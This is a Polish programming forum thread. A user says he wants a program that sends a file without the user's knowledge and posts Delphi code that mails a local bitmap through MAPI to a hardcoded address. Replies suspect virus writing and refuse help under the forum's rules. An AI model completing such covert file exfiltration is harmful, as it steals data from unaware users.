Wysyłanie plików mailem

0

Bardzo prosze o pomoc próbuje stworzyc program który bez wiedzy użytkownike wyśle gdzieś plik. Dlaczego poniższy kod mi nie działa?

unit Unit1;

interface

uses
 Windows, Messages,MApi, Classes, Controls, StdCtrls, SysUtils, Graphics, Forms, Dialogs;

type
 TForm1 = class(TForm)
  Button1: TButton;
  procedure Button1Click(Sender: TObject);
 private
  { Private declarations }
 public
  { Public declarations }
 end;

var
 Form1: TForm1;

implementation

{$R *.DFM}

procedure TForm1.Button1Click(Sender: TObject);

var
 MAPIFileDesc  : TMAPIFileDesc;
 MAPIMessage   : TMAPIMessage;
 MAPIRecipDesc  : TMapiRecipDesc;
 hMAPIDLL    : THandle;
 pfnMAPISendMail : TFNMAPISendMail;
begin

 //załadowanie biblioteki
 hMAPIDLL := LoadLibrary('MAPI32.DLL');
 if hMAPIDLL=0 then
  begin
   //zle się dzieje
  end;

 //pobranie adresu funkcji
 @pfnMAPISendMail := GetProcAddress(hMAPIDLL,'MAPISendMail');
 if @pfnMAPISendMail=nil then
  begin
   FreeLibrary(hMAPIDLL);
   //zle się dzieje
     ShowMessage('O Kurwa');
  end;

 //przygotowanie opisu adresata
 FillChar(MAPIRecipDesc,SizeOf(TMAPIRecipDesc),0);
 with MAPIRecipDesc do
  begin
   ulRecipClass := MAPI_TO;
   lpszName := 'Ktos';
   lpszAddress := '[email protected]';
  end;

 //przygotowanie opisu załšcznika
 FillChar(MAPIFileDesc,SizeOf(TMAPIFileDesc),0);
 with MAPIFileDesc do
  begin
   nPosition := Cardinal(-1);
   lpszPathName := 'C:\bitowa.bmp';
   lpszFileName := 'bitowa.bmp';
  end;

 //przygotowanie rekordu wiadomo?ci
 FillChar(MAPIMessage,SizeOf(TMAPIMessage),0);
 with MAPIMessage do
  begin
   lpszSubject := 'temat listu';
   lpszNoteText := 'tresc listu';
   nRecipCount := 1;
   lpRecips := @MAPIRecipDesc;
   nFileCount := 1;
   lpFiles := @MAPIFileDesc;
  end;

 //wysłanie
 if
pfnMAPISendMail(0,Handle,MAPIMessage,MAPI_DIALOG,0)<>SUCCESS_SUCCESS
then
  begin
   FreeLibrary(hMAPIDLL);
   //zle się dzieje
      ShowMessage('Coś sie po.....');
  end;
 //zwolnienie zasobów
 FreeLibrary(hMAPIDLL);
end;

end.
0

w FAQ masz wysyłanie plików przez Indy, z załącznikiem także. Przez MAPI bez wiedzy użytkownika raczej się nie ma prawa udać. Btw - wirusa chcesz powielić i wysłać? ;)

0

Ech... Mam nadzieję, że Ci nikt nie pomoże [diabel] . Po samym wstępie widać, że coś jest tutaj nie tak. 4p ma pewne zasady, które między innymi zawierają w sobie fakt, że nikt tu nie będzie pomagał pisać wirusów/robaków/trojanów/programów do odczytywania informacji, które powinne być przez Ciebie przeczytane itp. A tutaj mi czymś takim bardzo silnie śmierdzi...

1 użytkowników online, w tym zalogowanych: 0, gości: 1, botów: 0